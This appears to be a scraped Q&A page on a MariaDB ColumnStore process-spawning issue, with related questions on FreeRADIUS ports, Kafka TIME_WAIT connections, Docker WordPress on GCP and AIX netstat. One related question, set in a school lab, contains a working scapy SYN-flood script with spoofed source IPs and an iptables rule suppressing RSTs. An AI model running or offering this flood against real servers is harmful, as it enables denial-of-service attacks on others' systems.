MariaDB with ColumnStore spawns a lot of child processes - mariadb

I'm having a strange issue with a MariaDB Community 10.6 with ColumnStore installation running on a Ubuntu 20.04.
After I start the server and my application begins sending queries to it, the process ExeMgr seems to spawn an infinity number of child processes. It keeps growing and growing and all of them has a TCP connection with the MariaDb process, which is kind of expected, since MariaDB redirects the query to the ColumnStore engine. It's worth mentioning that there are SELECT, INSERT, UPDATE and DELETE instructions going into the ColumnStore engine.
This is the output of the netstat command:
. . .
# netstat -anp | grep ExeMgr
tcp 0 0 0.0.0.0:8601 0.0.0.0:* LISTEN 89497/ExeMgr
tcp 0 0 127.0.0.1:8601 127.0.0.1:10090 ESTABLISHED 89497/ExeMgr
tcp 0 0 127.0.0.1:8601 127.0.0.1:62000 ESTABLISHED 89497/ExeMgr
tcp 0 0 127.0.0.1:8601 127.0.0.1:11230 ESTABLISHED 89497/ExeMgr
tcp 0 0 127.0.0.1:8601 127.0.0.1:61200 ESTABLISHED 89497/ExeMgr
tcp 0 0 127.0.0.1:8601 127.0.0.1:60304 ESTABLISHED 89497/ExeMgr
tcp 0 0 127.0.0.1:8601 127.0.0.1:60892 ESTABLISHED 89497/ExeMgr
tcp 0 0 127.0.0.1:8601 127.0.0.1:61992 ESTABLISHED 89497/ExeMgr
tcp 0 0 127.0.0.1:8601 127.0.0.1:61038 ESTABLISHED 89497/ExeMgr
tcp 0 0 127.0.0.1:8601 127.0.0.1:61410 ESTABLISHED 89497/ExeMgr
tcp 0 0 127.0.0.1:8601 127.0.0.1:11680 ESTABLISHED 89497/ExeMgr
tcp 0 0 127.0.0.1:8601 127.0.0.1:60838 ESTABLISHED 89497/ExeMgr
tcp 0 0 127.0.0.1:8601 127.0.0.1:61226 ESTABLISHED 89497/ExeMgr
tcp 0 0 127.0.0.1:8601 127.0.0.1:60474 ESTABLISHED 89497/ExeMgr
tcp 0 0 127.0.0.1:8601 127.0.0.1:12740 ESTABLISHED 89497/ExeMgr
tcp 0 0 127.0.0.1:8601 127.0.0.1:10986 ESTABLISHED 89497/ExeMgr
tcp 0 0 127.0.0.1:8601 127.0.0.1:10886 ESTABLISHED 89497/ExeMgr
tcp 0 0 127.0.0.1:8601 127.0.0.1:61332 ESTABLISHED 89497/ExeMgr
tcp 0 0 127.0.0.1:8601 127.0.0.1:10068 ESTABLISHED 89497/ExeMgr
. . .
And this is the output of the command pstree. At the moment when I took it, there were already 480 ExeMgr subprocesses running:
My application is a NodeJS application and it does have a connection pool. But we are working with a max number of 5 connections. When I run the commando show processlist I can see only 5 connections as expected.
Has anyone faced this problem? Maybe it is some kind of bug or a configuration that I missed appyling on the server?
Thanks for any help!

Related

Freeradius extra open port

I have server with available many subnets, I would like to my Freeradius only listen on specific IP addresses. I use freeradius configuration from Arch package freeradius-3.0.19-3. The only changes are:
removed IPv6 listen sections
in IPv4 listen section I configured listening address to ipaddr="192.168.1.1"
In my configuration I have also listening on 127.0.0.1:18120, but when I check open ports I got:
ss -nlp|grep radiusd
udp UNCONN 0 0 0.0.0.0:40012 0.0.0.0:* users:(("radiusd",pid=22199,fd=9))
udp UNCONN 0 0 127.0.0.1:18120 0.0.0.0:* users:(("radiusd",pid=22199,fd=7))
udp UNCONN 0 0 192.168.1.1:1812 0.0.0.0:* users:(("radiusd",pid=22199,fd=8))
This port 40012 is dynamic allocated after freeradius service restart the number is different.
ss -nlp|grep radiusd
udp UNCONN 0 0 0.0.0.0:42447 0.0.0.0:* users:(("radiusd",pid=26490,fd=9))
udp UNCONN 0 0 127.0.0.1:18120 0.0.0.0:* users:(("radiusd",pid=26490,fd=7))
udp UNCONN 0 0 192.168.1.1:1812 0.0.0.0:* users:(("radiusd",pid=26490,fd=8))
How to get rid of this port? What is a function of it?
This extra port is used for sending and receiving proxy packets. If you are not using proxying you can disable it in radiusd.conf, look for
proxy_requests = yes
$INCLUDE proxy.conf
change it to "no", and comment out the INCLUDE line.
If you want to change the address and/or port that is used, look at the listen sections in e.g. raddb/sites-enabled/default. You can add a new section with type = proxy to specifically set the address and port that is used.

Ubuntu server limits to 5 SYN_RECV

For a school project I'm trying to do a DOS on an Ubuntu server (18.04) using Ubuntu desktop 18.04 with scapy. They are both placed as VM on VirtualBox.
On server side I have a python SimpleHTTPServer on port 80 that is pingable and reachable via browser by the desktop machine.
I'm trying to DoSing it using this code:
#!/usr/bin/env python
import socket, random, sys
from scapy.all import *
def sendSYN(target, port):
#creating packet
# insert IP header fields
tcp = TCP()
ip = IP()
#set source IP as random valid IP
ip.src = "%i.%i.%i.%i" % (random.randint(1,254), random.randint(1,254), random.randint(1,254), random.randint(1,254))
ip.dst = target
# insert TCP header fields
tcp = TCP()
#set source port as random valid port
tcp.sport = random.randint(1,65535)
tcp.dport = port
#set SYN flag
tcp.flags = 'S'
send(ip/tcp)
return ;
#control arguments
if len(sys.argv) != 3:
print("Few argument: %s miss IP or miss PORT" % sys.argv[0])
sys.exit(1)
target = sys.argv[1]
port = int(sys.argv[2])
count = 0
print("Launch SYNFLOOD attack at %s:%i with SYN packets." % (target, port))
while 1:
#call SYNFlood attack
sendSYN(target,port)
count += 1
print("Total packets sent: %i" % count)
print("==========================================")
that basically sends an infinite number of SYN requests to the target machine on the user specified port. Its usage is: sudo python pythonDOS.py <target IP> <target port>.
Before launching this I do sudo iptables -A OUTPUT -p tcp -s <attacker IP> RST RST -j DROP on the attacking machine, to prevent the kernel to send RST request.
The attack seems to work: on wireshark on the attacker machine I can see that packets are sent correctly, but the server doesn't go down.
Running a netstat -antp | grep 80 on the target server I obtain this output:
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 192.168.1.51:80 35.206.32.111:50544 SYN_RECV -
tcp 0 0 192.168.1.51:80 138.221.76.4:24171 SYN_RECV -
tcp 0 0 192.168.1.51:80 164.253.235.187:64186 SYN_RECV -
tcp 0 0 192.168.1.51:80 55.107.244.119:17977 SYN_RECV -
tcp 0 0 192.168.1.51:80 85.158.134.238:37513 SYN_RECV -
and if I rerun the command after few seconds:
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 192.168.1.51:80 100.58.218.121:10306 SYN_RECV -
tcp 0 0 192.168.1.51:80 35.206.32.111:50544 SYN_RECV -
tcp 0 0 192.168.1.51:80 47.206.177.213:39759 SYN_RECV -
tcp 0 0 192.168.1.51:80 55.107.244.119:17977 SYN_RECV -
tcp 0 0 192.168.1.51:80 85.158.134.238:37513 SYN_RECV -
it seems that the server can handle a maximum of 5 SYN_RECV although I'm doing hundreds of these requests with the attacker machine, so I think this is why I can't DOS the server. The ufw is disabled. My objective is to disable or understand what's happening on the server and disable it in order to perform the DOS attack.
Any help is appreciated, thanks in advance.
UPDATE: I installed tshark on the target server and from that I can see that all the packets I'm sending are received on the server, so they are no lost in communication between the two virtual machines. Also running netstat -i I can see that there are no RX_DROP.

Kafka create too many TIME WAIT TCP connection

I use Kafka 0.11.0.3
I have a Kafka broker and a remote Zookeeper cluster. I start the Kafka server it successfully register its id in Zookeeper and I even can get the topic lists using the kafka-topic.sh command. The problem is I observe the following lines in the Kafka logs repeately:
[2019-01-08 10:51:09,138] WARN Attempting to send response via channel for which there is no open connection, connection id 192.168.0.201:9092-192.168.0.201:58292 (kafka.network.Processor)
[2019-01-08 10:51:09,198] INFO Creating /controller (is it secure? false) (kafka.utils.ZKCheckedEphemeral)
[2019-01-08 10:51:09,226] INFO Result of znode creation is: OK (kafka.utils.ZKCheckedEphemeral)
[2019-01-08 10:51:09,306] INFO Creating /controller (is it secure? false) (kafka.utils.ZKCheckedEphemeral)
[2019-01-08 10:51:09,327] INFO Result of znode creation is: OK (kafka.utils.ZKCheckedEphemeral)
[2019-01-08 10:51:09,382] WARN Attempting to send response via channel for which there is no open connection, connection id 192.168.0.201:9092-192.168.0.201:58296 (kafka.network.Processor)
[2019-01-08 10:51:09,408] INFO Creating /controller (is it secure? false) (kafka.utils.ZKCheckedEphemeral)
[2019-01-08 10:51:09,446] INFO Result of znode creation is: OK (kafka.utils.ZKCheckedEphemeral)
[2019-01-08 10:51:09,559] INFO Creating /controller (is it secure? false) (kafka.utils.ZKCheckedEphemeral)
[2019-01-08 10:51:09,602] INFO Result of znode creation is: OK (kafka.utils.ZKCheckedEphemeral)
The broker attempts to connect to the port 58292 on the same machine (that Kafka server is running) but it cannot establish the connection.
I also check the controller dir on the Zookeeper and it was empty.
More strange when I get the TCP established connections on the Kafka server node I observe so many TIME_WAIT connections:
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 192.168.0.201:55572 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:56290 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55442 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55512 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:56074 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:56286 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55460 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55904 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55488 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:56308 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55502 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:56326 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55960 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55930 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:56300 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:56004 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55470 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55474 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55432 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55412 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:56304 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55858 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55860 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:56324 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55388 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:56168 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55898 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55820 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55676 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:56202 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55756 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:56278 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55658 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55628 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:56038 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:56108 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55988 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55894 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55428 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55424 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:56128 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:56146 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55884 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:56280 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55798 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:56120 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55888 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55708 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55696 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:56298 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55646 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:56150 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55376 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55980 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55556 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:56208 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55752 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55982 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55864 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55760 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:56056 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:56002 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55536 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55576 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55392 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55726 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55426 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55710 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:56042 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:56264 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55606 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55972 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:56176 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55780 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:56342 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55534 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55438 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:56114 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:56068 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55880 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:56350 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55970 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55404 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55672 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55454 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55946 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:56126 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55538 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:56124 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55712 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:56084 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55992 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:56302 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55984 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55394 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55550 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:56094 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55936 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55530 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55868 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:56294 192.168.0.201:9092 TIME_WAIT -
tcp 0 0 192.168.0.201:55876 192.168.0.201:9092 TIME_WAIT -
tcp 0 31 192.168.0.201:57552 192.168.0.204:2181 ESTABLISHED 1015/java
The only successfully established connection is for Zookeeper (at the last line). I also checked the port 9092 from a remote node and it was open:
Starting Nmap 7.01 ( https://nmap.org ) at 2019-01-08 11:32 +0330
Nmap scan report for (192.168.0.201)
Host is up (0.0027s latency).
PORT STATE SERVICE
9092/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 0.08 seconds
Some points:
The broker was working fine for about 2 months and the error happened suddenly.
The Zookeeper cluster is working fine because some other components like HDFS are using that and there is no error.
The OS is CentOS7 and there is no firewall enabled.
Here is the Kafka server config:
broker.id=100
listeners=PLAINTEXT://192.168.0.201:9092
num.partitions=24
delete.topic.enable=true
log.dirs=/data/esb
zookeeper.connect=co1:2181,co2:2181
log.retention.hours=168
zookeeper.session.timeout.ms=40000
What can be the cause of the TIME_WAIT connections?
I got similar TIME_WAIT issue before, you may check your zookeeper log, default location is:
/bin/zookeeper.out
the cause of my issue is basically permission issue: I started zookeeper using normal user, but somehow the files under /zkdata are owned by root
the zookeeper log will tell you the reason

Cannot connect to Wordpress docker container.on google cloud platform

Ok so I have read the other connecting to docker container questions and mine does not seem to fit any of the other ones. So here it goes. I have installed docker and docker compose. I built the Wordpress site on a my home machine and am not trying to migrate it to GCP. I got a micro instance and installed everything on there and as far as I can tell everything is up and running as it should be. But when I go to log into the site from the web browser I get -
**This site can’t be reached
xx.xxx.xx.xx refused to connect.
Try:
Checking the connection
Checking the proxy and the firewall
ERR_CONNECTION_REFUSED**
these are the ports opened up in my .yml file
- "8000:80"</b>
- "443"</b>
- "22"</b>
I have also tried 8080:80 and 80:80 to no availe
and when I check docker port it shows
80/tcp -> 0.0.0.0:32770</br>
80/tcp -> 0.0.0.0:8000</br>
22/tcp -> 0.0.0.0:32771</br>
443/tcp -> 0.0.0.0:443</br>
and when I check netstat from localhost and from another machine I get
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:17600 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:17603 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.1.1:53 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:17500 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 ::1:631 :::* LISTEN -
tcp6 0 0 :::17500 :::* LISTEN -
udp 0 0 0.0.0.0:49953 0.0.0.0:* -
udp 22720 0 0.0.0.0:56225 0.0.0.0:* -
udp 52224 0 127.0.1.1:53 0.0.0.0:* -
udp 19584 0 0.0.0.0:68 0.0.0.0:* -
udp 46080 0 0.0.0.0:17500 0.0.0.0:* -
udp 214144 0 0.0.0.0:17500 0.0.0.0:* -
udp 35072 0 0.0.0.0:5353 0.0.0.0:* -
udp 9216 0 0.0.0.0:5353 0.0.0.0:* -
udp 0 0 0.0.0.0:631 0.0.0.0:* -
udp6 0 0 :::44824 :::* -
udp6 16896 0 :::5353 :::* -
udp6 3840 0 :::5353 :::*
-
when I run docker ps I get:
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS
NAMES
1c25a8707960 wordpress:latest "docker-entrypoint.s…" 37 minutes ago Up 37 minutes 0.0.0.0:443->443/
tcp, 0.0.0.0:32771->22/tcp, 0.0.0.0:8000->80/tcp, 0.0.0.0:32770->80/tcp wp-site_wordpress_1
96f3c136c746 mysql:5.7 "docker-entrypoint.s…" 37 minutes ago Up 37 minutes 3306/tcp
wp-site_wp-db_1
Also I have both http and https open on my google cloud firewall.
So if I am listening on port 80 and have it mapped to 8000(the port I was connecting to the container on on my dev machine) I do not understand why I can not get to the WP site in the browser. Any help would be greatly appreciated. Also I think I included everything needed for this question. If there is anything else I will be more than happy to post it .
Ok so after a lot of tries I finally figured it out. In the yml file I needed to take out port -"80" and change -"8000:80" to -"80:80" and then remove the old containers and rebuild them.

netstat for AIX 6.1

is there a way to grep for network status based on pid on an AIX Box?
I'd like to know if there is a reasonable equivalent of this command below
netstat -anp | grep 2767
tcp 0 0 :::47801 :::* LISTEN 2767/java
tcp 0 0 :::33830 :::* LISTEN 2767/java
tcp 0 0 :::8009 :::* LISTEN 2767/java
tcp 0 0 :::8080 :::* LISTEN 2767/java
tcp 0 0 ::ffff:15.213.27.40:60373 ::ffff:15.213.27.21:22 ESTABLISHED 2767/java
tcp 0 0 ::ffff:15.213.27.40:35040 ::ffff:15.213.27.99:22 ESTABLISHED 2767/java
2767 being the processId

Resources